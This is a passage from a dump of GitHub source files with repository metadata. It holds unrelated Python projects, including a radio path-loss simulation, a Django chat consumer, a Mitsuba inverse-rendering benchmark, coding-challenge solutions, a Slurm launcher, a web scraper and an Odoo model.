1:\n Recived_power = Transmit_power + Antenna_gain - Path_loss - 4\n else:\n Recived_power = Transmit_power + Antenna_gain - Path_loss - 8.2\n \n return Recived_power\n\ndef DoPathLoss(Los_Probability,carrier_frequency,Distance):\n \"\"\"\n calculate path loss by 3GPP spec\n Arg:\n Los_Probability: unit (dB)\n carrier_frequency: unint (GHz)\n Distance: unit (m)\n \n return:\n Path_loss: unit (dB)\n \"\"\"\n Decied_Conncection_Status=np.random.rand()\n if Los_Probability == 1:\n \n return 32.4+21*math.log10(Distance)+20*math.log10(carrier_frequency) ##unit(dB)\n else:\n \n return 32.4+31.9*math.log10(Distance)+20*math.log10(carrier_frequency) ##unit(dB)\n\n\ndef IndoorDoPathLoss(Los_Probability,carrier_frequency,Distance):\n \"\"\"\n calculate path loss by 3GPP spec\n Arg:\n Los_Probability: unit (dB)\n carrier_frequency: unint (GHz)\n Distance: unit (m)\n \n return:\n Path_loss: unit (dB)\n \"\"\"\n Decied_Conncection_Status=np.random.rand()\n if Los_Probability == 1:\n \n return 31.84+21.50*np.log10(Distance)+19.00*np.log10(carrier_frequency) ##unit(dB)\n else:\n \n return 32.4+31.9*np.log10(Distance)+20*np.log10(carrier_frequency) ##unit(dB)\n\ndef LosProbability(distance):\n \"\"\"\n calculate Line-of-sight Probability by 3GPP spec\n Arg:\n Distance: unit (m)\n \n return:\n Line-of-sight Probability\n \"\"\"\n minimum_distance =18\n if distance <= minimum_distance:\n return 1\n else:\n return (18/distance)+(np.exp(-1*distance/36)*(1-(18/distance)))\n\n# def DoConectionStatus(Distance,TransmitPower):\n# Path_loss = DoPathLoss(1,carrier_frequency,Distance)\n# DoChannelModel(Transmit_power,Antenna_gain,Path_loss,Shadow_fading)\n\ndef dBmToWatt(dBm):\n \n if dBm == float('-Inf'):\n return 0\n return 10**((dBm-30)/10)\n\ndef wTodBm(mW):\n if mW == 0 :\n return float('-Inf')\n return 10 * np.log10(mW)+30\n\n\n# def simplexnoise(seed,x_asix,y_asix):\n# simplex = opensimplex()\n# A = np.zeros([x_asix, y_asix])\n# for y in range(0, x_asix):\n# for x in range(0, y_asix):\n# value = simplex.noise2d(x,y)\n# color = int((value + 1) * 128)\n# A[x, y] = color\n\n# plt.imshow(A)\n# plt.show()\n\n\n\n \n\n\nif __name__ == '__main__':\n\n X_rows = 100\n Y_cols = 100\n # simplexnoise(123,X_rows,Y_cols)\n \n LOS_NLOS = 1\n N0=-83.02 #dBm\n transmit_bandwidth = 1e+8\n throughput_2D_total = np.zeros((X_rows,Y_cols), dtype=float)\n distance_2D= np.empty((X_rows,Y_cols), dtype=float)\n indterval = 1\n base_satation = np.array([[15.1,20.1],[25.1,80.1],[80.5,43.2]])\n transmit_power = 0.1 #W\n powerdB = wTodBm(transmit_power)\n for base in base_satation:\n # print(base)\n # print('===========================')\n # print(throughput_2D_total)\n # print('===========================')\n throughput_2D = np.empty((X_rows,Y_cols), dtype=float)\n distance_2D= np.empty((X_rows,Y_cols), dtype=float)\n for x in range(X_rows):\n for y in range(Y_cols):\n distance = DoDistance(x*indterval,y*indterval,base[0],base[1])\n # print(f'ue_x:{x*indterval},ue_y:{y*indterval},bs_x:{base[0]},bs_y:{base[1]} , distance:{distance}')\n \n ### Indoor LOS calculation\n Indoor_LOS_Path_loss=IndoorDoPathLoss(LOS_NLOS,carrier_frequency,distance)\n Indoor_LOS_Recived_power = IndoorDoChannelModel(powerdB,Antenna_gain,Indoor_LOS_Path_loss,LOS_NLOS)\n Indoor_LOS_SNR=DoSNR(1,dBmToWatt(Indoor_LOS_Recived_power),dBmToWatt(N0))\n throughput_2D[x,y] = DoThroughput(transmit_bandwidth,Indoor_LOS_SNR)\n ### Indoor LOS calculation\n \n throughput_2D_total += throughput_2D\n levels = np.linspace(0,3000,30)\n x_axis,y_axis = np.meshgrid(range(X_rows),range(Y_cols))\n fig,ax = plt.subplots()\n throughput_2D_total=throughput_2D_total/(1e+6)\n \n thr=ax.contour(x_axis,y_axis,throughput_2D_total,levels=levels)\n \n ax.clabel(thr,inline=True,fontsize=10)\n \n ax.set_xlabel('x coordinate (m)')\n ax.set_ylabel('y coordinate (m)')\n ax.set_title('Analyze user rates at different coordubates (Mbps)\\nLOS Urban Micro cell (UMi)')\n ax.set_aspect('equal')\n ax.scatter(base_satation[:,1],base_satation[:,0],c='red',marker='^',label='Base station',s=100,zorder=10)\n ax.legend()\n plt.savefig('thr.jpg')\n plt.show() \n # for en in np.nditer(distance_2D):\n # print(en)\n print(throughput_2D)\n exit(1)\n Distance = 100\n N0=-83.02 #dBm\n recp=-115.44\n transmit_bandwidth = 1e+8\n transmit_power = 0.2 # W\n LOS_NLOS = 1\n dis = 100\n for dis in range(1,100):\n powerdB = wTodBm(transmit_power)\n print(powerdB)\n LOS_Path_loss=DoPathLoss(LOS_NLOS,carrier_frequency,dis)\n NLOS_Path_loss=DoPathLoss(0,carrier_frequency,dis)\n Indoor_LOS_Path_loss=IndoorDoPathLoss(LOS_NLOS,carrier_frequency,dis)\n print(f'==============Distance == {dis}m ==============')\n print(f'LOS_Path_loss : {LOS_Path_loss} , NLOS_Path_loss:{NLOS_Path_loss}, Indoor_LOS_Path_loss:{Indoor_LOS_Path_loss}')\n # print(Path_loss)\n Indoor_LOS_Recived_power = IndoorDoChannelModel(powerdB,Antenna_gain,Indoor_LOS_Path_loss,LOS_NLOS)\n LOS_Recived_power=DoChannelModel(powerdB,Antenna_gain,LOS_Path_loss,LOS_NLOS)\n NLOS_Recived_power=DoChannelModel(powerdB,Antenna_gain,NLOS_Path_loss,0)\n print(f'LOS_Recived_power:{LOS_Recived_power} , NLOS_Recived_power:{NLOS_Recived_power},Indoor_LOS_Recived_power : {Indoor_LOS_Recived_power}')\n Indoor_LOS_SNR=DoSNR(1,dBmToWatt(Indoor_LOS_Recived_power),dBmToWatt(N0))\n LOS_SNR=DoSNR(1,dBmToWatt(LOS_Recived_power),dBmToWatt(N0))\n NLOS_SNR=DoSNR(1,dBmToWatt(NLOS_Recived_power),dBmToWatt(N0))\n print(f'LOS_SNR:{LOS_SNR} , NLOS_SNR:{NLOS_SNR},Indoor_LOS_SNR:{Indoor_LOS_SNR}')\n # SNR = DoSNR(1,dBToWatt(-106.41),dBToWatt(N0))\n Indoor_LOS_thr = DoThroughput(transmit_bandwidth,Indoor_LOS_SNR)\n LOS_thr=DoThroughput(transmit_bandwidth,LOS_SNR)\n NLOS_thr=DoThroughput(transmit_bandwidth,NLOS_SNR)\n print(f'LOS_thr : {LOS_thr:g} , NLOS_thr : {NLOS_thr:g}, Indoor_LOS_thr: {Indoor_LOS_thr:g}')\n print('============================')\n\n \n # NNo\n # NNo","repo_name":"Carter0212/Thesis_HHO_SMA","sub_path":"thr.py","file_name":"thr.py","file_ext":"py","file_size_in_byte":8397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71328981025","text":"import json\n\nfrom channels.generic.websocket import AsyncWebsocketConsumer\n\nfrom chat.consumer_helper import save_user_channel_name, set_user_offline, get_user_channel_name, save_chat\n\n\nclass PersonalChatConsumer(AsyncWebsocketConsumer):\n\n def __init__(self, *args, **kwargs):\n super().__init__(args, kwargs)\n self.user_id = None\n\n # connect user\n async def connect(self):\n self.user_id = self.scope['url_route']['kwargs']['user_id']\n await self.accept()\n await save_user_channel_name(user_id=self.user_id, channel_name=self.channel_name)\n\n # disconnect user\n async def disconnect(self, code):\n await set_user_offline(self.user_id)\n\n # send msg after validating user online status\n async def receive(self, text_data=None, bytes_data=None):\n text_data_json = json.loads(text_data)\n message = text_data_json['message']\n receiver_user_id = text_data_json['send_to']\n\n send_to = await get_user_channel_name(user_id=text_data_json['send_to'])\n\n if send_to:\n await self.channel_layer.send(\n send_to,\n {\n 'type': 'chatroom.message',\n 'message': message,\n 'receiver_user_id': receiver_user_id,\n 'sender_id': self.user_id\n }\n )\n else:\n print(\"Consumer receive method error.\")\n\n # send message over ws\n async def chatroom_message(self, event):\n await self.send(\n text_data=json.dumps(\n {\n 'message': event['message'],\n 'sender_id': event['sender_id']\n }\n )\n )\n\n await save_chat(event)\n","repo_name":"a-rcane/chatapp","sub_path":"chat/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"15862883403","text":"#!/usr/bin/env python\n\n#%%\nimport mitsuba as mi\nimport drjit as dr\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport json\n\nmi.set_variant('cuda_ad_rgb')\n\noutput_dir_base = 'inverse-rendering'\nos.makedirs(output_dir_base, exist_ok=True)\n\n#%% Load scene and parameters\n\nscenes = [\n { 'name': 'christmas-tree',\n 'path': '../scenes/christmas-tree/scene.xml',\n 'key': 'mat-pine.brdf_0.base_color.data',\n 'restir_spp': 1,\n 'restir_mcap': 32,\n 'mitsuba_spp': 1,\n 'time': 350e3,\n },\n { 'name': 'tire',\n 'path': '../scenes/tire/scene.xml',\n 'key': 'mat-tire.brdf_0.roughness.data',\n 'restir_spp': 1,\n 'mitsuba_spp': 1,\n 'time': 90e3,\n 'learning_rate': 0.005,\n },\n { 'name': 'ashtray',\n 'path': '../scenes/ashtray/scene.xml',\n 'key': 'mat-ashtray.brdf_0.anisotropic.data',\n 'restir_spp': 1,\n 'mitsuba_spp': 1,\n 'time': 30e3,\n },\n { 'name': 'chalice',\n 'path': '../scenes/chalice/scene.xml',\n 'key': 'mat-chalice.brdf_0.roughness.data',\n 'restir_spp': 1,\n 'mitsuba_spp': 1,\n 'time': 30e3,\n },\n]\nscene_idx = 0\n\nrender_spp = 512\nspp_forward = 32\nequal_time_iterations = 20\n\ns = scenes[scene_idx]\nscene_path, scene_name, key = s['path'], s['name'], s['key']\noutput_dir = os.path.join(output_dir_base, scene_name)\nos.makedirs(output_dir, exist_ok=True)\n\ndef convert_to_lum(grad_tensor, extend_dim=False):\n if len(grad_tensor.shape) != 3:\n return grad_tensor\n if grad_tensor.shape[2] == 1:\n if extend_dim:\n return grad_tensor\n return grad_tensor[:,:,0]\n grad_color = dr.unravel(mi.Color3f, dr.ravel(grad_tensor[...,:3]))\n grad_lum = mi.luminance(grad_color)\n shape = (grad_tensor.shape[0], grad_tensor.shape[1], 1) if extend_dim else \\\n (grad_tensor.shape[0], grad_tensor.shape[1])\n return mi.TensorXf(grad_lum, shape=shape)\n\nprint(f'-------------------- Running {scene_name} -------------------------')\n\nscene = mi.load_file(scene_path, integrator='restir_dr')\nis_base_color = 'base_color' in key\nif 'learning_rate' in s:\n learning_rate = s['learning_rate']\nelif is_base_color:\n learning_rate = 0.1\nelse:\n learning_rate = 0.01\n\nimage_gt = mi.render(scene, seed=0, spp=render_spp);\nmi.util.write_bitmap(os.path.join(output_dir, 'render_gt.exr'), image_gt)\n\nparams = mi.traverse(scene)\nparam_ref = mi.TensorXf(params[key])\nparam_shape = np.array(params[key].shape)\n\nparam_initial = np.full(param_shape.tolist(), 0.5)\nif param_shape[2] == 4:\n param_initial[:,:,3] = 1\n param_ref[:,:,3] = 1\nparams[key] = mi.TensorXf(param_initial)\n\nparams.update();\n\nimage_initial = mi.render(scene, seed=0, spp=render_spp);\n\nopt = mi.ad.Adam(lr=learning_rate)\nopt[key] = params[key]\nparams.update(opt);\nscene.integrator().param_name = key\n\ndr.set_flag(dr.JitFlag.KernelHistory, 1)\n\ndef get_elapsed_execution_time():\n hist = dr.kernel_history()\n elapsed_time = 0\n for entry in hist:\n elapsed_time += entry['execution_time']\n return elapsed_time\n\ndef relse(a, b):\n return dr.sqr(a - b) / (dr.sqr(b) + 1e-2)\n\ndef relmse(a, b):\n return dr.mean(relse(a, b))\n\ndef mae(a, b):\n return dr.mean(dr.abs(a - b))\n\ndef derivative_err(img, ref):\n return dr.sum(relse(img, ref)) / dr.count(dr.neq(ref.array, 0))\n\ndef loss_func(image):\n return relmse(image, image_gt)\n\nparams[key] = mi.TensorXf(param_initial)\nparams.update();\n\nopt = mi.ad.Adam(lr=learning_rate)\nopt[key] = params[key]\nparams.update(opt);\n\ndef get_equal_time_optimization(use_ref, n_time, spp_forward, spp_grad, M_cap=None):\n np.random.seed(0)\n \n # Reset initial params\n opt.reset(key)\n opt[key] = mi.TensorXf(param_initial)\n params.update(opt);\n\n scene.integrator().use_ref = use_ref\n scene.integrator().use_positivization = True\n scene.integrator().enable_temporal_reuse = True\n scene.integrator().M_cap = M_cap\n scene.integrator().reset()\n\n it = 0\n total_time = 0\n times = []\n losses = []\n while True:\n # Perform a (noisy) differentiable rendering of the scene\n image = mi.render(scene, params, spp=spp_forward,\n spp_grad=spp_grad,\n seed=np.random.randint(2**31))\n\n # Evaluate the objective function from the current rendered image\n loss = loss_func(image)\n\n # Backpropagate through the rendering process\n dr.backward(loss)\n\n # Optimizer: take a gradient descent step\n opt.step()\n\n # Post-process the optimized parameters to ensure legal color values.\n opt[key] = dr.clamp(opt[key], 0.0, 1.0)\n\n # Update the scene state to the new optimized values\n params.update(opt)\n\n total_time += get_elapsed_execution_time()\n if total_time > n_time:\n break\n times.append(total_time / 1e3)\n losses.append(loss[0])\n\n print(f'-- Iteration {it} -- Loss {losses[-1]:.3f} --')\n\n it += 1\n\n return times, losses, mi.TensorXf(params[key])\n\n#%% Run equal time optimization\n\nrestir_times, restir_losses, restir_param = \\\n get_equal_time_optimization(False, s['time'], spp_forward, s['restir_spp'], M_cap=s.get('restir_mcap', 16))\n\nmitsuba_times, mitsuba_losses, mitsuba_param = \\\n get_equal_time_optimization(True, s['time'], spp_forward, s['mitsuba_spp']) \n\n#%% Output equal time optimization\nplt.clf()\nplt.figure(figsize=(10, 4), dpi=100, constrained_layout=True);\nplt.plot(mitsuba_times, mitsuba_losses, 'm-o', label='Mitsuba 3', linewidth=6.0, markersize=4.0, mfc='white')\nplt.plot(restir_times, restir_losses, 'c-o', label='Ours', linewidth=6.0, markersize=4.0, mfc='white')\nplt.xlabel('Time (s)');\nplt.ylabel('Error');\nplt.yscale('log')\nplt.legend();\nplt.savefig(os.path.join(output_dir, 'inv_convergence.pdf'), bbox_inches='tight', pad_inches=0.0)\n\n#%% Output equal time final image\nparams[key] = mitsuba_param\nparams.update();\nmitsuba_image = mi.render(scene, seed=0, spp=render_spp);\nmi.util.write_bitmap(os.path.join(output_dir, 'render_final_mitsuba.exr'), mitsuba_image)\n\nparams[key] = restir_param\nparams.update();\nrestir_image = mi.render(scene, seed=0, spp=render_spp);\nmi.util.write_bitmap(os.path.join(output_dir, 'render_final_restir.exr'), restir_image)\n\n#%%\nrestir_img_err = loss_func(restir_image)[0]\nmitsuba_img_err = loss_func(mitsuba_image)[0]\n\nprint(\n f'ReSTIR, error: {restir_img_err:.3e} ({restir_img_err/mitsuba_img_err:.2f}x)\\n'\n f'Mitsuba, error: {mitsuba_img_err:.3e} (1.00x)\\n'\n)\n\nwith open(os.path.join(output_dir, 'inv_convergence.json'), 'w') as f:\n json_str = json.dumps({\n 'mitsuba_times': mitsuba_times,\n 'mitsuba_losses': mitsuba_losses,\n 'restir_times': restir_times,\n 'restir_losses': restir_losses,\n 'mitsuba_img_err': mitsuba_img_err,\n 'restir_img_err': restir_img_err,\n 'img_err_reduction': restir_img_err/mitsuba_img_err,\n }, indent=2)\n f.write(json_str)\n","repo_name":"wchang22/ReSTIR_DR","sub_path":"notebooks/inverse-rendering.py","file_name":"inverse-rendering.py","file_ext":"py","file_size_in_byte":6934,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"7"} +{"seq_id":"27986385223","text":"# I'm sure, you know Google's \"Did you mean ...?\", when you entered a search term and mistyped a word. In this kata we want to implement something similar.\n# You'll get an entered term (lowercase string) and an array of known words (also lowercase strings). Your task is to find out, which word from the dictionary\n# is most similar to the entered one. The similarity is described by the minimum number of letters you have to add, remove or replace in order to get from the\n# entered word to one of the dictionary. The lower the number of required changes, the higher the similarity between each two words.\n# Same words are obviously the most similar ones. A word that needs one letter to be changed is more similar to another word that needs 2 (or more) letters to be\n# changed. E.g. the mistyped term berr is more similar to beer (1 letter to be replaced) than to barrel (3 letters to be changed in total).\n#\n# Extend the dictionary in a way, that it is able to return you the most similar word from the list of known words.\n#\n# Code Examples:\n#\n# fruits = new Dictionary(['cherry', 'pineapple', 'melon', 'strawberry', 'raspberry']);\n# fruits.findMostSimilar('strawbery'); // must return \"strawberry\"\n# fruits.findMostSimilar('berry'); // must return \"cherry\"\n#\n# things = new Dictionary(['stars', 'mars', 'wars', 'codec', 'codewars']);\n# things.findMostSimilar('coddwars'); // must return \"codewars\"\n#\n# languages = new Dictionary(['javascript', 'java', 'ruby', 'php', 'python', 'coffeescript']);\n# languages.findMostSimilar('heaven'); // must return \"java\"\n# languages.findMostSimilar('javascript'); // must return \"javascript\" (same words are obviously the most similar ones)\n# I know, many of you would disagree that java is more similar to heaven than all the other ones, but in this kata it is ;)\n#\n# Additional notes:\n# there is always exactly one possible correct solution\n\nclass Dictionary:\n def __init__(self,words):\n self.words=words\n def find_most_similar(self,term):\n # break down the term to list letters\n # loop through the words class, first check if the term is in the words list. if yes return\n # if not check each word.\n diff = len(list(term))\n term = term.lower()\n similar_word = None\n cost = 1000\n sum_letters = 0\n for one in self.words:\n word = one.lower()\n if term == word:\n return one\n else:\n different_letters = [0 if letter in word else 1 for letter in term]\n diff_letter_len = abs (len (list (word)) - len (list (term)))\n if cost > sum(different_letters)+ diff_letter_len:\n cost = sum(different_letters)+ diff_letter_len\n similar_word = one\n return similar_word\n\n\n\nwords=['java', 'python']\ntest_dict = Dictionary (words)\n\nprint(test_dict.find_most_similar('heaven'))\n# edit distance\n\n","repo_name":"DenizSka/CodingNomads","sub_path":"notes_to_self/coding_challenge/03_07_did_you_mean.py","file_name":"03_07_did_you_mean.py","file_ext":"py","file_size_in_byte":2927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"13591775681","text":"class Solution:\n def wordPattern(self, pattern: str, s: str) -> bool:\n letterToWord = {}\n usedWordSet = set()\n stringArr = s.split(\" \")\n\n # Edge case if stringArr and pattern lens are not equal\n if len(stringArr) != len(pattern):\n return False\n\n for i in range(len(pattern)):\n word = letterToWord.get(pattern[i], -1)\n if word == -1 and stringArr[i] not in usedWordSet:\n letterToWord[pattern[i]] = stringArr[i]\n usedWordSet.add(stringArr[i])\n continue\n if word != stringArr[i]:\n return False\n return True\n\n # Time Complexity: O(n)\n # Space Complexity: O(n)\n # Datastructure(s): Hashtable, Set\n # Algorithm(s): None\n # Pattern: None\n \n ###\n # Solve Description: Instantiate a hashtable for mapping letter to word and a set for keeping track\n # of words that have been stored into the table. Loop through each char in the pattern, mapping \n # the corresponding word in the same position to the char if it doesn't exist in the table AND if\n # the word has not been mapped before (each word can only be mapped once). If the current char has\n # a word it maps to, check if the retrieved word is the same as the string in the current pattern \n # to word position. Return False if they do not match. Otherwise, if the whole loop completes, \n # return True\n ###\n \n # Link: https://leetcode.com/problems/word-pattern/\n\n \n","repo_name":"Juichilee/Solved-LeetCode-Problems","sub_path":"Python/word_pattern.py","file_name":"word_pattern.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"37672435004","text":"from slurmpy import Slurm\n\ndef get_slurm():\n # if segment_len <= 512:\n # constraint = \"rtx2080ti\"\n # elif test:\n # constraint = \"rtx2080ti\"\n # else:\n # constraint = \"rtx8000\"\n constraint = \"rtx2080ti\"\n sbatch_arguments = {\"account\": \"chacha\", \n \"partition\": \"cdac-contrib\", # \"dev\"\n \"mem\": \"50gb\",\n \"time\": \"04:00:00\",\n \"output\": \"/home/chacha/slurm/out/explain_teach%j.%N.stdout\",\n \"error\": \"/home/chacha/slurm/out/explain_teach%j.%N.stderr\",\n \"chdir\": \"/home/chacha/slurm\",\n \"gpus-per-node\": f\"{1}\",\n \"ntasks\": \"1\",\n \"nodes\": \"1\",\n # \"nodelist\": \"a007\",\n \"constraint\": constraint,\n \"signal\": \"SIGUSR1@120\"}\n\n # if dependent_job:\n # sbatch_arguments.update({\"dependency\": f\"afterany:{dependent_job}\"})\n\n s = Slurm(\"explain_teach\", sbatch_arguments, bash_strict=False)\n return s\n\n# experiments = [\n# ('mortality', '24', 'all_but_discharge'),\n# ('readmission', 'retro', 'discharge'),\n# ('readmission', 'retro', 'all')\n# ]\n\n# segment_mapping = {318:512, 2500:3000}\n\n# balanced_flag = [False, True]\n# # structured = True\n# structured_flag = [True, ]\n# models = [\n# # (\"emilyalsentzer/Bio_ClinicalBERT\", 318),\n# # (\"emilyalsentzer/Bio_Discharge_Summary_BERT\", 318),\n# # (\"bert-base-uncased\", 318),\n# (\"roberta-base\", 318),\n# (\"microsoft/deberta-v3-base\", 318),\n# # (\"allenai/longformer-base-4096\", 2500)\n# ]\n# learning_rates = [\n# \"5e-3\", \"1e-3\", \"5e-4\",\n# # \"5e-4\", \"5e-5\", \"5e-6\"\n# ]\n#####\n# Important\n# n_gpu = 4\n# train = True\n# test = True\n#####\n# print(f\"Training: {train}, Testing: {test}\")\n# splits = ['train', 'valid', 'test']\n# TODO: add mem-per-gpu flag\n\n\ncommand = f\"\"\"\n source ~/.bashrc\n whoami\n conda activate teaching\n cd /net/scratch/chacha/explain_teach/models\n srun python RESN.py \\\n --embed_dim=10 \\\n --wandb_mode=online \\\n --wandb_group=resn-emb2 \\\n --output_dir=results/resn-emb2 \\\n --train_dir=/net/scratch/hanliu-shared/data/bm/train \\\n --valid_dir=/net/scratch/hanliu-shared/data/bm/valid \\\n --dataloader_num_workers=4 \\\n --gpus=1 \\\n --seed=42 \\\n --max_epochs=100 \\\n --learning_rate=1e-4 \\\n --vertical_flip=0.5 \\\n --rotate=30 \\\n --scale=0.2 \\\n --train_batch_size=160 \\\n --do_train \\\n --pretrained\"\"\"\n\n # source /opt/conda/etc/profile.d/conda.sh\n # conda activate clinical-bert\n\n # cd /home/chaochunh/investigate-clinicalbert\n\n # srun python -m models.transformers.main \\\n # --task {task} \\\n # --period {period} \\\n # --note_type {note_type} \\\n # --num_labels 2 \\\n # --max_epochs 10 \\\n # --max_seq_length {max_seq_length} \\\n # --segment_len {segment_length} \\\n # --output_dir /net/scratch/chaochunh/investigate-clinicalbert \\\n # --data_dir /net/scratch/chaochunh/test_mimic_output \\\n # --model_name_or_path {model} \\\n # --warmup_steps 1000 \\\n # --cache_dir /net/scratch/chaochunh/transformers \\\n # --train_batch_size 8 \\\n # --eval_batch_size 8 \\\n # --learning_rate {lr} \\\n # --fp16\"\"\"\ns = get_slurm()\ns.run(command)\n# for task, period, note_type in experiments:\n# for structured in structured_flag:\n# for balanced in balanced_flag:\n# for model, segment_length in models:\n# for lr in learning_rates:\n# max_seq_length = segment_mapping[segment_length]\n# command = f\"\"\"\n# source /opt/conda/etc/profile.d/conda.sh\n# conda activate clinical-bert\n\n# cd /home/chaochunh/investigate-clinicalbert\n\n# srun python -m models.transformers.main \\\n# --task {task} \\\n# --period {period} \\\n# --note_type {note_type} \\\n# --num_labels 2 \\\n# --max_epochs 10 \\\n# --max_seq_length {max_seq_length} \\\n# --segment_len {segment_length} \\\n# --output_dir /net/scratch/chaochunh/investigate-clinicalbert \\\n# --data_dir /net/scratch/chaochunh/test_mimic_output \\\n# --model_name_or_path {model} \\\n# --warmup_steps 1000 \\\n# --cache_dir /net/scratch/chaochunh/transformers \\\n# --train_batch_size 8 \\\n# --eval_batch_size 8 \\\n# --learning_rate {lr} \\\n# --fp16\"\"\"\n# if balanced:\n# command += \" --balanced\"\n# if structured: \n# command += \" --structured\"\n\n# if train:\n# s = get_slurm(segment_length)\n# command += f\" --gpus {n_gpu}\"\n# command += \" --do_train\"\n# command += \" --overwrite_dir\"\n# job_id = s.run(command)\n# # submit dependent job after training compelete\n# if test:\n# command = command.replace(\" --overwrite_dir\", \"\")\n# command = command.replace(f\" --gpus {n_gpu}\", \" --gpus 1\")\n# command = command.replace(\" --do_train\", \" --do_predict\")\n# command += \" --offline\"\n# s_dependent = get_slurm(segment_length, test=True, dependent_job=job_id)\n# s_dependent.run(command)\n# elif test:\n# s = get_slurm(segment_length, test=True)\n# command += f\" --gpus 1\"\n# command += \" --offline\"\n# command += \" --do_predict\"\n# s.run(command)\n# else:\n # raise(\"Neither train or test is applied.\")","repo_name":"harry-tian/ai-driven-tutorial","sub_path":"models/old/test_slurm_chacha.py","file_name":"test_slurm_chacha.py","file_ext":"py","file_size_in_byte":5668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"31084977392","text":"from django.shortcuts import render\nimport markdown\nfrom pathlib import Path\nfrom django.shortcuts import redirect\nfrom app.forms import ContactForm\nfrom django.core.mail import send_mail\nfrom config import settings_local\n\ndef index(request, page):\n\n pages = [\n 'about',\n 'start',\n 'why',\n 'comfort',\n 'legs',\n 'hands',\n 'back',\n 'chest',\n 'shoulders',\n 'head',\n 'exercises',\n 'sources',\n 'contact',\n ]\n\n try:\n\n # check whether submitted page exists\n # in the above list of pages\n pages.index(page)\n\n except:\n\n return redirect('/')\n\n else:\n\n BASE_DIR = Path(__file__).resolve().parent.parent\n path = str(BASE_DIR) + '/templates/articles/' + page + '.mkd'\n mkd_file = open(path, 'r', encoding='utf-8')\n mkd = mkd_file.read()\n html = markdown.markdown(mkd)\n\n context = {\n 'page': page,\n 'html': html,\n }\n\n return render(request, 'article.html', context)\n\n\ndef contact(request):\n \"\"\"Allow the user to send an email to the author.\n\n \"\"\"\n\n if request.method == 'POST':\n\n form = ContactForm(request.POST)\n\n if form.is_valid():\n\n name = form.cleaned_data['name']\n email = form.cleaned_data['email']\n subject = form.cleaned_data['subject']\n message = form.cleaned_data['message']\n\n send_mail(\n 'MP - ' + name + ' ' + subject,\n message,\n email,\n settings_local.AUTHOR,\n fail_silently=False,\n )\n context = {\n 'page': 'contact',\n }\n return render(request, 'contact-success.html', context)\n\n else:\n\n form = ContactForm()\n\n context = {\n 'page': 'contact',\n 'form': form,\n }\n\n return render(request, 'contact.html', context)\n","repo_name":"jamescrg/meditation-posture","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"25469451702","text":"import re\nimport requests\nfrom requests.exceptions import HTTPError\n\n\ndef get_links(tags_a_raw):\n links = []\n for tag_link in tags_a_raw:\n href = tag_link.split('href=\"')\n link = href[1][:href[1].index('\"')]\n\n if not link in links:\n links.append(link)\n\n return links\n\n\ndef get_images(tags_img_raw):\n images = []\n for tag_image in tags_img_raw:\n src = tag_image.split('src=\"')\n image = src[1][:src[1].index('\"')]\n\n if not image in images:\n images.append(image)\n\n return images\n\n\nif __name__ == '__main__':\n print('*** Web Scraper ***')\n\n url = input(\"Please enter an URL: \").strip()\n\n try:\n response = requests.get(url)\n response.raise_for_status()\n except HTTPError as http_err:\n print(f'HTTP error occurred: {http_err}')\n except Exception as err:\n print(f'Other error occurred: {err}')\n else:\n print(f'GET {url}: SUCCESS')\n decoded_content = response.content.decode()\n\n tag_items = {\n 'link': [],\n 'image': []\n }\n tag_patterns = {\n 'link': {'pattern': '\n# © 2015 Antonio Espinosa \n# © 2015 Javier Iniesta \n# © 2016 Antonio Espinosa - \n# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).\n\nfrom openerp import models, fields, api, _\nfrom openerp.exceptions import ValidationError\n\n\nclass ResPartner(models.Model):\n _inherit = 'res.partner'\n\n mass_mailing_contact_ids = fields.One2many(\n string=\"Mailing lists\",\n oldname=\"mass_mailing_contacts\",\n domain=[('opt_out', '=', False)],\n comodel_name='mail.mass_mailing.contact', inverse_name='partner_id')\n mass_mailing_contacts_count = fields.Integer(\n string='Mailing list number',\n compute='_compute_mass_mailing_contacts_count', store=True)\n mass_mailing_stats = fields.One2many(\n string=\"Mass mailing stats\",\n comodel_name='mail.mail.statistics', inverse_name='partner_id')\n mass_mailing_stats_count = fields.Integer(\n string='Mass mailing stats number',\n compute='_compute_mass_mailing_stats_count', store=True)\n\n @api.one\n @api.constrains('email')\n def _check_email_mass_mailing_contacts(self):\n if self.mass_mailing_contact_ids and not self.email:\n raise ValidationError(\n _(\"This partner '%s' is subscribed to one or more \"\n \"mailing lists. Email must be assigned.\" % self.name))\n\n @api.one\n @api.depends('mass_mailing_contact_ids',\n 'mass_mailing_contact_ids.opt_out')\n def _compute_mass_mailing_contacts_count(self):\n self.mass_mailing_contacts_count = len(self.mass_mailing_contact_ids)\n\n @api.one\n @api.depends('mass_mailing_stats')\n def _compute_mass_mailing_stats_count(self):\n self.mass_mailing_stats_count = len(self.mass_mailing_stats)\n\n @api.multi\n def write(self, vals):\n res = super(ResPartner, self).write(vals)\n if vals.get('name') or vals.get('email'):\n mm_vals = {}\n if vals.get('name'):\n mm_vals['name'] = vals['name']\n if vals.get('email'):\n mm_vals['name'] = vals['email']\n self.env[\"mail.mass_mailing.contact\"].search([\n (\"partner_id\", \"in\", self.ids),\n ]).write(mm_vals)\n return res\n","repo_name":"ateneolab/odoo-dev","sub_path":"mass_mailing_partner/models/res_partner.py","file_name":"res_partner.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"27267845966","text":"from fastapi import status, HTTPException, APIRouter\nimport psycopg2\n\nfrom src.utils.config import ConfigParser\nfrom src.repository.posts import (\n InMemoryPostRepository, PostgreSQLPostRepository, PostgresPostSQLQueries\n)\nfrom src.schemas import PostCreate\n\n# This was done before the Foreign Key restriction on the Post 